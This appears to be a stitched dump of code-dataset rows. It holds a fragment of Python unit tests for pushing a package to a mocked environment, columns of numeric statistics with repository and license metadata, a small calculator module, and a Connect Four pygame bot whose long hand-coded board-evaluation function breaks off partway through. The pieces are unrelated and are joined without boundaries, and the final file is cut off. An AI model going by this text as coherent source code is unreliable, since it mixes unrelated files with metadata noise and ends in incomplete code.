pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'type::with_behaviour::1.0', 'name': 'type::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'type::with_behaviour::1.0', 'name': 'simple'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_has_calls([
call({
"name": "test",
"projectId": "type::with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
def test_push_updates_behaviour_scenarios_if_exists(self):
pkg_sim = self.simlab.simulate_pkg_type_with_behaviour()
pkg = Pkg(pkg_sim.path)
push_options = PushOptions()
lm_sim = self.simlab.simulate_lm()
lm_sim.add_project({'id': 'type::with_behaviour::1.0', 'name': 'type::with_behaviour::1.0'})
lm_sim.add_assembly_configuration({'id': 'existing', 'projectId': 'type::with_behaviour::1.0', 'name': 'simple'})
lm_sim.add_scenario({'id': 'existingRuntime', 'projectId': 'type::with_behaviour::1.0', 'name': 'runtime'})
lm_sim.add_scenario({'id': 'existingTest', 'projectId': 'type::with_behaviour::1.0', 'name': 'test'})
lm_session = lm_sim.as_mocked_session()
env_sessions = EnvironmentSessions(lm_session)
result = pkg.push(env_sessions, push_options)
self.assertIsInstance(result, PkgContent)
lm_session.behaviour_driver.create_scenario.assert_not_called()
lm_session.behaviour_driver.update_scenario.assert_has_calls([
call({
"id": "existingTest",
"name": "test",
"projectId": "type::with_behaviour::1.0",
"description": "a test scenario",
"stages": [
{
"name": "Stage One",
"steps": [
{
"stepDefinitionName": "Utilities::SleepForTime",
"properties": {
"sleepTime": "20",
"timeUnit": "seconds"
}
}
]
}
],
"assemblyActors": [
{
"instanceName": "simple",
"assemblyConfigurationId": "existing",
"initialState": "Active",
"uninstallOnExit": True,
"provided": False
}
],
"createdAt": "2019-01-01T01:00:00.613Z",
"lastModifiedAt": "2019-01-02T01:00:00.613Z"
})
])
| 46.942197
| 161
| 0.581332
| 821
| 8,121
| 5.464068
| 0.138855
| 0.046144
| 0.079581
| 0.068212
| 0.882746
| 0.842844
| 0.824565
| 0.810299
| 0.792911
| 0.783772
| 0
| 0.033761
| 0.299717
| 8,121
| 173
| 162
| 46.942197
| 0.755055
| 0
| 0
| 0.722892
| 0
| 0
| 0.221867
| 0.098375
| 0
| 0
| 0
| 0
| 0.10241
| 1
| 0.036145
| false
| 0
| 0.042169
| 0
| 0.084337
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5c75ff91fcbe8c201918760a5aa94a10d22af91
| 471
|
py
|
Python
|
calculator/helpers.py
|
akshayvaidya/python-calculator
|
d07272b8ba8f15ebec0eb516673bde39138d5987
|
[
"MIT"
] | null | null | null |
calculator/helpers.py
|
akshayvaidya/python-calculator
|
d07272b8ba8f15ebec0eb516673bde39138d5987
|
[
"MIT"
] | null | null | null |
calculator/helpers.py
|
akshayvaidya/python-calculator
|
d07272b8ba8f15ebec0eb516673bde39138d5987
|
[
"MIT"
] | null | null | null |
def add(a,b) :
if isinstance(a, (int,float)) and isinstance(b,(int,float)) :
return a+b
return
def sub(a,b) :
if isinstance(a, (int,float)) and isinstance(b,(int,float)) :
return a-b
return
def mul(a,b) :
if isinstance(a, (int,float)) and isinstance(b,(int,float)) :
return a*b
return
def div(a,b) :
if isinstance(a, (int,float)) and isinstance(b,(int,float)) and b != 0 :
return a/b
return
| 22.428571
| 76
| 0.562633
| 75
| 471
| 3.533333
| 0.186667
| 0.060377
| 0.207547
| 0.211321
| 0.871698
| 0.871698
| 0.871698
| 0.871698
| 0.871698
| 0.871698
| 0
| 0.00295
| 0.280255
| 471
| 21
| 77
| 22.428571
| 0.778761
| 0
| 0
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a5e7e7ab428cb89c84ab48c2f01039b52a630ba1
| 68,613
|
py
|
Python
|
main.py
|
kindanoob/pyconnect_four
|
ce2068b5afb2660015f8ad8ef6ef1eb9f32cfa47
|
[
"MIT"
] | null | null | null |
main.py
|
kindanoob/pyconnect_four
|
ce2068b5afb2660015f8ad8ef6ef1eb9f32cfa47
|
[
"MIT"
] | null | null | null |
main.py
|
kindanoob/pyconnect_four
|
ce2068b5afb2660015f8ad8ef6ef1eb9f32cfa47
|
[
"MIT"
] | null | null | null |
import sys
import random
import time
import pygame
import pygame.locals
INFINITY = 1000000
SMALL_INIFINITY = 1000
MINIMAX_DEPTH = 7
ALPHA_0 = -INFINITY
BETA_0 = INFINITY
WINDOWWIDTH = 640
WINDOWHEIGHT = 480
BOARDWIDTH = 350
BOARDHEIGHT = 350
X_MARGIN = (WINDOWWIDTH - BOARDWIDTH) / 2
Y_MARGIN = (WINDOWHEIGHT - BOARDHEIGHT) / 2
SQUARE_SIZE = BOARDWIDTH / 7
DISC_RADIUS = int(SQUARE_SIZE * 0.4)
TEXT_SIZE = 40
TEXT_SIZE_FIRST_MOVE = 22
TEXT_SIZE_PLAY_AGAIN = int(SQUARE_SIZE * 0.5)
TEXT_SIZE_GAME_RESULT = int(SQUARE_SIZE * 0.75)
#colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (250, 10, 10)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (250, 250, 10)
#BACKGROUND_COLOR = (0, 255, 150)
BACKGROUND_COLOR = (100, 100, 100)
BOARD_COLOR = (60, 60, 250)
class Game_window:
def __init__(self):
pygame.init()
self.window = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))
pygame.display.set_caption("Four in a row")
class Bot:
def __init__(self):
self.timebank = None
self.time_per_move = None
self.player_names = None
self.bot_name = None
self.bot_id = None
self.color = None
self.num_cols = 7
self.num_rows = 6
self.round = None
self.board = [["0"] * self.num_cols for i in range(self.num_rows)]
self.window = Game_window()
self.is_finished = False
self.move_number = 0
self.play_again = True
def store_settings(self, msg):
self.timebank = int(msg[2])
#print("set timebank to {}, type: {}".format(self.timebank, type(self.timebank)))
self.time_per_move = int(sys.stdin.readline().strip().split(" ")[2])
#print("set time_per_move to {}".format(self.time_per_move))
self.player_names = sys.stdin.readline().strip().split(" ")[2]
#print("set player_names to {}".format(self.player_names))
self.bot_name = sys.stdin.readline().strip().split(" ")[2]
#print("set bot_name to {}".format(self.bot_name))
self.bot_id = sys.stdin.readline().strip().split(" ")[2]
if (self.bot_id == "1"): self.color = 1
else: self.color = -1
#print("set bot_id to {}".format(self.bot_id))
self.num_cols = int(sys.stdin.readline().strip().split(" ")[2])
#print("set num_cols to {}".format(self.num_cols))
self.num_rows = int(sys.stdin.readline().strip().split(" ")[2])
#print("set num_rows to {}".format(self.num_rows))
self.board = [[0] * self.num_cols for i in range(self.num_rows)]
#self.board = [[0] * self.num_cols for i in range(self.num_rows)]
#print("initial board state: {}".format(self.board))
def update(self, msg):
if (msg[2] == "round"):
#self.board = [[0] * self.num_cols for i in range(self.num_rows)]
# print("initial board state: {}".format(self.board))
self.round = int(msg[3])
elif (msg[2] == "field"):
#print("set round number to {}".format(self.round))
#a = (sys.stdin.readline().split(" "))[3].split(";")
a = msg[3].split(";")
#print("a = {}".format(a))
for i in range(self.num_rows):
b = a[i].split(",")
for j in range(self.num_cols):
self.board[i][j] = b[j]
#print("elem: {}, type: {}".format(self.board[0][0], type(self.board[0][0])))
#print("updated board state: {}".format(self.board))
def eval_board(self, l_color):
# the higher is returned score, the better for the first player
num_threats_first = 0
num_threats_second = 0
# check for bottom_left -> top_right diagonal threats
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == '1' and self.board[0][3] == '0'): num_threats_first += 1
if (self.board[3][0] == '0' and self.board[2][1] == self.board[1][2] == self.board[0][3] == '1'): num_threats_first += 1
if (self.board[3][0] == self.board[1][2] == self.board[0][3] == '1' and self.board[2][1] == '0'): num_threats_first += 1
if (self.board[3][0] == self.board[2][1] == self.board[0][3] == '1' and self.board[1][2] == '0'): num_threats_first += 1
if (self.board[3][0] == self.board[2][1] == self.board[1][2] == '2' and self.board[0][3] == '0'): num_threats_second += 1
if (self.board[3][0] == '0' and self.board[2][1] == self.board[1][2] == self.board[0][3] == '2'): num_threats_second += 1
if (self.board[3][0] == self.board[1][2] == self.board[0][3] == '2' and self.board[2][1] == '0'): num_threats_second += 1
if (self.board[3][0] == self.board[2][1] == self.board[0][3] == '2' and self.board[1][2] == '0'): num_threats_second += 1
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == '1' and self.board[1][3] == '0'): num_threats_first += 1
if (self.board[4][0] == '0' and self.board[3][1] == self.board[2][2] == self.board[1][3] == '1'): num_threats_first += 1
if (self.board[4][0] == self.board[2][2] == self.board[1][3] == '1' and self.board[3][1] == '0'): num_threats_first += 1
if (self.board[4][0] == self.board[3][1] == self.board[1][3] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[4][0] == self.board[3][1] == self.board[2][2] == '2' and self.board[1][3] == '0'): num_threats_second += 1
if (self.board[4][0] == '0' and self.board[3][1] == self.board[2][2] == self.board[1][3] == '2'): num_threats_second += 1
if (self.board[4][0] == self.board[2][2] == self.board[1][3] == '2' and self.board[3][1] == '0'): num_threats_second += 1
if (self.board[4][0] == self.board[3][1] == self.board[1][3] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == '1' and self.board[0][4] == '0'): num_threats_first += 1
if (self.board[3][1] == '0' and self.board[2][2] == self.board[1][3] == self.board[0][4] == '1'): num_threats_first += 1
if (self.board[3][1] == self.board[1][3] == self.board[0][4] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[3][1] == self.board[2][2] == self.board[0][4] == '1' and self.board[1][3] == '0'): num_threats_first += 1
if (self.board[3][1] == self.board[2][2] == self.board[1][3] == '2' and self.board[0][4] == '0'): num_threats_second += 1
if (self.board[3][1] == '0' and self.board[2][2] == self.board[1][3] == self.board[0][4] == '2'): num_threats_second += 1
if (self.board[3][1] == self.board[1][3] == self.board[0][4] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[3][1] == self.board[2][2] == self.board[0][4] == '2' and self.board[1][3] == '0'): num_threats_second += 1
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[5][0] == '0' and self.board[4][1] == self.board[3][2] == self.board[2][3] == '1'): num_threats_first += 1
if (self.board[5][0] == self.board[4][1] == self.board[2][3] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[5][0] == self.board[3][2] == self.board[2][3] == '1' and self.board[4][1] == '0'): num_threats_first += 1
if (self.board[5][0] == self.board[4][1] == self.board[3][2] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[5][0] == '0' and self.board[4][1] == self.board[3][2] == self.board[2][3] == '2'): num_threats_second += 1
if (self.board[5][0] == self.board[4][1] == self.board[2][3] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[5][0] == self.board[3][2] == self.board[2][3] == '2' and self.board[4][1] == '0'): num_threats_second += 1
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == '1' and self.board[1][4] == '0'): num_threats_first += 1
if (self.board[4][1] == '0' and self.board[3][2] == self.board[2][3] == self.board[1][4] == '1'): num_threats_first += 1
if (self.board[4][1] == self.board[2][3] == self.board[1][4] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[4][1] == self.board[3][2] == self.board[1][4] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[4][1] == self.board[3][2] == self.board[2][3] == '2' and self.board[1][4] == '0'): num_threats_second += 1
if (self.board[4][1] == '0' and self.board[3][2] == self.board[2][3] == self.board[1][4] == '2'): num_threats_second += 1
if (self.board[4][1] == self.board[2][3] == self.board[1][4] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[4][1] == self.board[3][2] == self.board[1][4] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == '1' and self.board[0][5] == '0'): num_threats_first += 1
if (self.board[3][2] == '0' and self.board[2][3] == self.board[1][4] == self.board[0][5] == '1'): num_threats_first += 1
if (self.board[3][2] == self.board[1][4] == self.board[0][5] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[3][2] == self.board[2][3] == self.board[0][5] == '1' and self.board[1][4] == '0'): num_threats_first += 1
if (self.board[3][2] == self.board[2][3] == self.board[1][4] == '2' and self.board[0][5] == '0'): num_threats_second += 1
if (self.board[3][2] == '0' and self.board[2][3] == self.board[1][4] == self.board[0][5] == '2'): num_threats_second += 1
if (self.board[3][2] == self.board[1][4] == self.board[0][5] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[3][2] == self.board[2][3] == self.board[0][5] == '2' and self.board[1][4] == '0'): num_threats_second += 1
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[5][1] == '0' and self.board[4][2] == self.board[3][3] == self.board[2][4] == '1'): num_threats_first += 1
if (self.board[5][1] == self.board[3][3] == self.board[2][4] == '1' and self.board[4][2] == '0'): num_threats_first += 1
if (self.board[5][1] == self.board[4][2] == self.board[2][4] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[5][1] == self.board[4][2] == self.board[3][3] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[5][1] == '0' and self.board[4][2] == self.board[3][3] == self.board[2][4] == '2'): num_threats_second += 1
if (self.board[5][1] == self.board[3][3] == self.board[2][4] == '2' and self.board[4][2] == '0'): num_threats_second += 1
if (self.board[5][1] == self.board[4][2] == self.board[2][4] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == '1' and self.board[1][5] == '0'): num_threats_first += 1
if (self.board[4][2] == '0' and self.board[3][3] == self.board[2][4] == self.board[1][5] == '1'): num_threats_first += 1
if (self.board[4][2] == self.board[2][4] == self.board[1][5] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[4][2] == self.board[3][3] == self.board[1][5] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[4][2] == self.board[3][3] == self.board[2][4] == '2' and self.board[1][5] == '0'): num_threats_second += 1
if (self.board[4][2] == '0' and self.board[3][3] == self.board[2][4] == self.board[1][5] == '2'): num_threats_second += 1
if (self.board[4][2] == self.board[2][4] == self.board[1][5] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[4][2] == self.board[3][3] == self.board[1][5] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == '1' and self.board[0][6] == '0'): num_threats_first += 1
if (self.board[3][3] == '0' and self.board[2][4] == self.board[1][5] == self.board[0][6] == '1'): num_threats_first += 1
if (self.board[3][3] == self.board[1][5] == self.board[0][6] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[3][3] == self.board[2][4] == self.board[0][6] == '1' and self.board[1][5] == '0'): num_threats_first += 1
if (self.board[3][3] == self.board[2][4] == self.board[1][5] == '2' and self.board[0][6] == '0'): num_threats_second += 1
if (self.board[3][3] == '0' and self.board[2][4] == self.board[1][5] == self.board[0][6] == '2'): num_threats_second += 1
if (self.board[3][3] == self.board[1][5] == self.board[0][6] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[3][3] == self.board[2][4] == self.board[0][6] == '2' and self.board[1][5] == '0'): num_threats_second += 1
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == '1' and self.board[2][5] == '0'): num_threats_first += 1
if (self.board[5][2] == '0' and self.board[4][3] == self.board[3][4] == self.board[2][5] == '1'): num_threats_first += 1
if (self.board[5][2] == self.board[3][4] == self.board[2][5] == '1' and self.board[4][3] == '0'): num_threats_first += 1
if (self.board[5][2] == self.board[4][3] == self.board[2][5] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[5][2] == self.board[4][3] == self.board[3][4] == '2' and self.board[2][5] == '0'): num_threats_second += 1
if (self.board[5][2] == '0' and self.board[4][3] == self.board[3][4] == self.board[2][5] == '2'): num_threats_second += 1
if (self.board[5][2] == self.board[3][4] == self.board[2][5] == '2' and self.board[4][3] == '0'): num_threats_second += 1
if (self.board[5][2] == self.board[4][3] == self.board[2][5] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == '1' and self.board[1][6] == '0'): num_threats_first += 1
if (self.board[4][3] == '0' and self.board[3][4] == self.board[2][5] == self.board[1][6] == '1'): num_threats_first += 1
if (self.board[4][3] == self.board[2][5] == self.board[1][6] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[4][3] == self.board[3][4] == self.board[1][6] == '1' and self.board[2][5] == '0'): num_threats_first += 1
if (self.board[4][3] == self.board[3][4] == self.board[2][5] == '2' and self.board[1][6] == '0'): num_threats_second += 1
if (self.board[4][3] == '0' and self.board[3][4] == self.board[2][5] == self.board[1][6] == '2'): num_threats_second += 1
if (self.board[4][3] == self.board[2][5] == self.board[1][6] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[4][3] == self.board[3][4] == self.board[1][6] == '2' and self.board[2][5] == '0'): num_threats_second += 1
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == '1' and self.board[2][6] == '0'): num_threats_first += 1
if (self.board[5][3] == '0' and self.board[4][4] == self.board[3][5] == self.board[2][6] == '1'): num_threats_first += 1
if (self.board[5][3] == self.board[3][5] == self.board[2][6] == '1' and self.board[4][4] == '0'): num_threats_first += 1
if (self.board[5][3] == self.board[4][4] == self.board[2][6] == '1' and self.board[3][5] == '0'): num_threats_first += 1
if (self.board[5][3] == self.board[4][4] == self.board[3][5] == '2' and self.board[2][6] == '0'): num_threats_second += 1
if (self.board[5][3] == '0' and self.board[4][4] == self.board[3][5] == self.board[2][6] == '2'): num_threats_second += 1
if (self.board[5][3] == self.board[3][5] == self.board[2][6] == '2' and self.board[4][4] == '0'): num_threats_second += 1
if (self.board[5][3] == self.board[4][4] == self.board[2][6] == '2' and self.board[3][5] == '0'): num_threats_second += 1
# check for bottom_right -> top_left diagonal threats
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == '1' and self.board[5][3] == '0'): num_threats_first += 1
if (self.board[2][0] == '0' and self.board[3][1] == self.board[4][2] == self.board[5][3] == '1'): num_threats_first += 1
if (self.board[2][0] == self.board[4][2] == self.board[5][3] == '1' and self.board[3][1] == '0'): num_threats_first += 1
if (self.board[2][0] == self.board[3][1] == self.board[5][3] == '1' and self.board[4][2] == '0'): num_threats_first += 1
if (self.board[2][0] == self.board[3][1] == self.board[4][2] == '2' and self.board[5][3] == '0'): num_threats_second += 1
if (self.board[2][0] == '0' and self.board[3][1] == self.board[4][2] == self.board[5][3] == '2'): num_threats_second += 1
if (self.board[2][0] == self.board[4][2] == self.board[5][3] == '2' and self.board[3][1] == '0'): num_threats_second += 1
if (self.board[2][0] == self.board[3][1] == self.board[5][3] == '2' and self.board[4][2] == '0'): num_threats_second += 1
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == '1' and self.board[4][3] == '0'): num_threats_first += 1
if (self.board[1][0] == '0' and self.board[2][1] == self.board[3][2] == self.board[4][3] == '1'): num_threats_first += 1
if (self.board[1][0] == self.board[3][2] == self.board[4][3] == '1' and self.board[2][1] == '0'): num_threats_first += 1
if (self.board[1][0] == self.board[2][1] == self.board[4][3] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[1][0] == self.board[2][1] == self.board[3][2] == '2' and self.board[4][3] == '0'): num_threats_second += 1
if (self.board[1][0] == '0' and self.board[2][1] == self.board[3][2] == self.board[4][3] == '2'): num_threats_second += 1
if (self.board[1][0] == self.board[3][2] == self.board[4][3] == '2' and self.board[2][1] == '0'): num_threats_second += 1
if (self.board[1][0] == self.board[2][1] == self.board[4][3] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == '1' and self.board[5][4] == '0'): num_threats_first += 1
if (self.board[2][1] == '0' and self.board[3][2] == self.board[4][3] == self.board[5][4] == '1'): num_threats_first += 1
if (self.board[2][1] == self.board[4][3] == self.board[5][4] == '1' and self.board[3][2] == '0'): num_threats_first += 1
if (self.board[2][1] == self.board[3][2] == self.board[5][4] == '1' and self.board[4][3] == '0'): num_threats_first += 1
if (self.board[2][1] == self.board[3][2] == self.board[4][3] == '2' and self.board[5][4] == '0'): num_threats_second += 1
if (self.board[2][1] == '0' and self.board[3][2] == self.board[4][3] == self.board[5][4] == '2'): num_threats_second += 1
if (self.board[2][1] == self.board[4][3] == self.board[5][4] == '2' and self.board[3][2] == '0'): num_threats_second += 1
if (self.board[2][1] == self.board[3][2] == self.board[5][4] == '2' and self.board[4][3] == '0'): num_threats_second += 1
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[0][0] == '0' and self.board[1][1] == self.board[2][2] == self.board[3][3] == '1'): num_threats_first += 1
if (self.board[0][0] == self.board[2][2] == self.board[3][3] == '1' and self.board[1][1] == '0'): num_threats_first += 1
if (self.board[0][0] == self.board[1][1] == self.board[3][3] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[0][0] == self.board[1][1] == self.board[2][2] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[0][0] == '0' and self.board[1][1] == self.board[2][2] == self.board[3][3] == '2'): num_threats_second += 1
if (self.board[0][0] == self.board[2][2] == self.board[3][3] == '2' and self.board[1][1] == '0'): num_threats_second += 1
if (self.board[0][0] == self.board[1][1] == self.board[3][3] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == '1' and self.board[4][4] == '0'): num_threats_first += 1
if (self.board[1][1] == '0' and self.board[2][2] == self.board[3][3] == self.board[4][4] == '1'): num_threats_first += 1
if (self.board[1][1] == self.board[3][3] == self.board[4][4] == '1' and self.board[2][2] == '0'): num_threats_first += 1
if (self.board[1][1] == self.board[2][2] == self.board[4][4] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[1][1] == self.board[2][2] == self.board[3][3] == '2' and self.board[4][4] == '0'): num_threats_second += 1
if (self.board[1][1] == '0' and self.board[2][2] == self.board[3][3] == self.board[4][4] == '2'): num_threats_second += 1
if (self.board[1][1] == self.board[3][3] == self.board[4][4] == '2' and self.board[2][2] == '0'): num_threats_second += 1
if (self.board[1][1] == self.board[2][2] == self.board[4][4] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == '1' and self.board[5][5] == '0'): num_threats_first += 1
if (self.board[2][2] == '0' and self.board[3][3] == self.board[4][4] == self.board[5][5] == '1'): num_threats_first += 1
if (self.board[2][2] == self.board[4][4] == self.board[5][5] == '1' and self.board[3][3] == '0'): num_threats_first += 1
if (self.board[2][2] == self.board[3][3] == self.board[5][5] == '1' and self.board[4][4] == '0'): num_threats_first += 1
if (self.board[2][2] == self.board[3][3] == self.board[4][4] == '2' and self.board[5][5] == '0'): num_threats_second += 1
if (self.board[2][2] == '0' and self.board[3][3] == self.board[4][4] == self.board[5][5] == '2'): num_threats_second += 1
if (self.board[2][2] == self.board[4][4] == self.board[5][5] == '2' and self.board[3][3] == '0'): num_threats_second += 1
if (self.board[2][2] == self.board[3][3] == self.board[5][5] == '2' and self.board[4][4] == '0'): num_threats_second += 1
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[0][1] == '0' and self.board[1][2] == self.board[2][3] == self.board[3][4] == '1'): num_threats_first += 1
if (self.board[0][1] == self.board[2][3] == self.board[3][4] == '1' and self.board[1][2] == '0'): num_threats_first += 1
if (self.board[0][1] == self.board[1][2] == self.board[3][4] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[0][1] == self.board[1][2] == self.board[2][3] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[0][1] == '0' and self.board[1][2] == self.board[2][3] == self.board[3][4] == '2'): num_threats_second += 1
if (self.board[0][1] == self.board[2][3] == self.board[3][4] == '2' and self.board[1][2] == '0'): num_threats_second += 1
if (self.board[0][1] == self.board[1][2] == self.board[3][4] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == '1' and self.board[4][5] == '0'): num_threats_first += 1
if (self.board[1][2] == '0' and self.board[2][3] == self.board[3][4] == self.board[4][5] == '1'): num_threats_first += 1
if (self.board[1][2] == self.board[3][4] == self.board[4][5] == '1' and self.board[2][3] == '0'): num_threats_first += 1
if (self.board[1][2] == self.board[2][3] == self.board[4][5] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[1][2] == self.board[2][3] == self.board[3][4] == '2' and self.board[4][5] == '0'): num_threats_second += 1
if (self.board[1][2] == '0' and self.board[2][3] == self.board[3][4] == self.board[4][5] == '2'): num_threats_second += 1
if (self.board[1][2] == self.board[3][4] == self.board[4][5] == '2' and self.board[2][3] == '0'): num_threats_second += 1
if (self.board[1][2] == self.board[2][3] == self.board[4][5] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == '1' and self.board[5][6] == '0'): num_threats_first += 1
if (self.board[2][3] == '0' and self.board[3][4] == self.board[4][5] == self.board[5][6] == '1'): num_threats_first += 1
if (self.board[2][3] == self.board[4][5] == self.board[5][6] == '1' and self.board[3][4] == '0'): num_threats_first += 1
if (self.board[2][3] == self.board[3][4] == self.board[5][6] == '1' and self.board[4][5] == '0'): num_threats_first += 1
if (self.board[2][3] == self.board[3][4] == self.board[4][5] == '2' and self.board[5][6] == '0'): num_threats_second += 1
if (self.board[2][3] == '0' and self.board[3][4] == self.board[4][5] == self.board[5][6] == '2'): num_threats_second += 1
if (self.board[2][3] == self.board[4][5] == self.board[5][6] == '2' and self.board[3][4] == '0'): num_threats_second += 1
if (self.board[2][3] == self.board[3][4] == self.board[5][6] == '2' and self.board[4][5] == '0'): num_threats_second += 1
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == '1' and self.board[3][5] == '0'): num_threats_first += 1
if (self.board[0][2] == '0' and self.board[1][3] == self.board[2][4] == self.board[3][5] == '1'): num_threats_first += 1
if (self.board[0][2] == self.board[2][4] == self.board[3][5] == '1' and self.board[1][3] == '0'): num_threats_first += 1
if (self.board[0][2] == self.board[1][3] == self.board[3][5] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[0][2] == self.board[1][3] == self.board[2][4] == '2' and self.board[3][5] == '0'): num_threats_second += 1
if (self.board[0][2] == '0' and self.board[1][3] == self.board[2][4] == self.board[3][5] == '2'): num_threats_second += 1
if (self.board[0][2] == self.board[2][4] == self.board[3][5] == '2' and self.board[1][3] == '0'): num_threats_second += 1
if (self.board[0][2] == self.board[1][3] == self.board[3][5] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == '1' and self.board[4][6] == '0'): num_threats_first += 1
if (self.board[1][3] == '0' and self.board[2][4] == self.board[3][5] == self.board[4][6] == '1'): num_threats_first += 1
if (self.board[1][3] == self.board[3][5] == self.board[4][6] == '1' and self.board[2][4] == '0'): num_threats_first += 1
if (self.board[1][3] == self.board[2][4] == self.board[4][6] == '1' and self.board[3][5] == '0'): num_threats_first += 1
if (self.board[1][3] == self.board[2][4] == self.board[3][5] == '2' and self.board[4][6] == '0'): num_threats_second += 1
if (self.board[1][3] == '0' and self.board[2][4] == self.board[3][5] == self.board[4][6] == '2'): num_threats_second += 1
if (self.board[1][3] == self.board[3][5] == self.board[4][6] == '2' and self.board[2][4] == '0'): num_threats_second += 1
if (self.board[1][3] == self.board[2][4] == self.board[4][6] == '2' and self.board[3][5] == '0'): num_threats_second += 1
if (self.board[0][3] == self.board[1][4] == self.board[2][5] == '1' and self.board[3][6] == '0'): num_threats_first += 1
if (self.board[0][3] == '0' and self.board[1][4] == self.board[2][5] == self.board[3][6] == '1'): num_threats_first += 1
if (self.board[0][3] == self.board[2][5] == self.board[3][6] == '1' and self.board[1][4] == '0'): num_threats_first += 1
if (self.board[0][3] == self.board[1][4] == self.board[3][6] == '1' and self.board[2][5] == '0'): num_threats_first += 1
